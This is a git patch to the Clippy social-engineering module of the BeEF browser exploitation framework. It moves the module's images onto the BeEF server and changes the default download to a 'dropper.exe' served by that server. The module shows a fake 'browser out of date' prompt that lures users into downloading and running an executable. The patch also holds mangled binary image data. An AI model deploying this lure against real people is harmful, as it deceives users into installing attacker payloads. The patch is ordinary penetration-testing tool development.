From 13428e6ff7c051172eb2cadb8fc9f76200ccc774 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 18 Jul 2015 06:48:10 +0000 Subject: [PATCH] Host clippy images locally --- .../clippy/assets/README.txt | 2 ++ .../clippy/assets/clippy-main.png | Bin 0 -> 2753 bytes .../clippy/assets/clippy-speech-bottom.png | Bin 0 -> 238 bytes .../clippy/assets/clippy-speech-mid.png | Bin 0 -> 142 bytes .../clippy/assets/clippy-speech-top.png | Bin 0 -> 185 bytes modules/social_engineering/clippy/config.yaml | 2 +- modules/social_engineering/clippy/module.rb | 21 ++++++++++++++++-- 7 files changed, 22 insertions(+), 3 deletions(-) create mode 100644 modules/social_engineering/clippy/assets/README.txt create mode 100644 modules/social_engineering/clippy/assets/clippy-main.png create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-bottom.png create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-mid.png create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-top.png diff --git a/modules/social_engineering/clippy/assets/README.txt b/modules/social_engineering/clippy/assets/README.txt new file mode 100644 index 000000000..9fe306ab3 --- /dev/null +++ b/modules/social_engineering/clippy/assets/README.txt @@ -0,0 +1,2 @@ +heretic-clippy is copyright (c) 2013 sprky0 +Homepage: https://github.com/sprky0/heretic-clippy diff --git a/modules/social_engineering/clippy/assets/clippy-main.png b/modules/social_engineering/clippy/assets/clippy-main.png new file mode 100644 index 0000000000000000000000000000000000000000..89327c614c1d096fb4ace45c6b04a7084eb30a67 GIT binary patch literal 2753 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 literal 0 HcmV?d00001 diff --git a/modules/social_engineering/clippy/assets/clippy-speech-mid.png b/modules/social_engineering/clippy/assets/clippy-speech-mid.png new file mode 100644 index 0000000000000000000000000000000000000000..bde639834a74993704201ceaff5580718cfb4a6d GIT binary patch literal 142 zcmeAS@N?(olHy`uVBq!ia0vp^O+d`W!3-q*?aHcvlw^r(L`iUdT1k0gQ7VIDN`6wR zf@f}GdTLN=VoGJ<$y6JlBDMgZ5LY1m|Nj{&&VQ$YEICgX$B>F!NeKxu2?q`sylM$l k@3Bg}!r6SDlYxzopr02;L^2LJ#7 literal 0 HcmV?d00001 diff --git a/modules/social_engineering/clippy/assets/clippy-speech-top.png b/modules/social_engineering/clippy/assets/clippy-speech-top.png new file mode 100644 index 0000000000000000000000000000000000000000..b1192cf09eab5c646b5bffe3150b0cc5b4bbc39e GIT binary patch literal 185 zcmeAS@N?(olHy`uVBq!ia0vp^O+d`S!3-pszFjW_Qj#UE5hcO-X(i=}MX3yqDfvmM z3ZA)%>8U}fi7AzZCsS>JiZ}y&LR^9L|Nm$H|NlSn*(V(!hq)xkFZlm|hU=$z9f4eP zPZ!6Kid$#SHS#hj@Gu=b{3^AVnLAE1(BY{RR`M4Lw`3r e%swERz;Ny$^YW;J@_&FvFnGH9xvX
You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt." authors: ["vt [nick.freeman@security-assessment.com]", "denden [denis.andzakovic@security-assessment.com]"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/clippy/module.rb b/modules/social_engineering/clippy/module.rb index 5cc650861..2476530cc 100755 --- a/modules/social_engineering/clippy/module.rb +++ b/modules/social_engineering/clippy/module.rb @@ -4,12 +4,25 @@ # See the file 'doc/COPYING' for copying permission # class Clippy < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-bottom.png','/clippy/clippy-speech-bottom','png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-mid.png','/clippy/clippy-speech-mid','png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-top.png','/clippy/clippy-speech-top','png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-main.png','/clippy/clippy-main','png') + end def self.options + @configuration = BeEF::Core::Configuration.instance + proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http" + beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") + base_host = "#{proto}://#{beef_host}:#{beef_port}" + return [ - {'name' =>'clippydir', 'description' =>'Webdir containing clippy image', 'ui_label'=>'Clippy image', 'value' => 'http://clippy.ajbnet.com/1.0.0/'}, + {'name' =>'clippydir', 'description' =>'Webdir containing clippy images', 'ui_label'=>'Clippy image directory', 'value' => "#{base_host}/clippy/"}, {'name' =>'askusertext', 'description' =>'Text for speech bubble', 'ui_label'=>'Custom text', 'value' => 'Your browser appears to be out of date. Would you like to upgrade it?'}, - {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'}, + {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => "#{base_host}/dropper.exe"}, {'name' =>'respawntime', 'description' =>'', 'ui_label'=>'Time until Clippy shows his face again', 'value' => '5000'}, {'name' =>'thankyoumessage', 'description' =>'Thankyou message after downloading', 'ui_label'=>'Thankyou message after downloading', 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!'} ] @@ -21,6 +34,10 @@ class Clippy < BeEF::Core::Command # def post_execute save({'answer' => @datastore['answer']}) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-main.png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-top.png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-mid.png') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-bottom.png') end end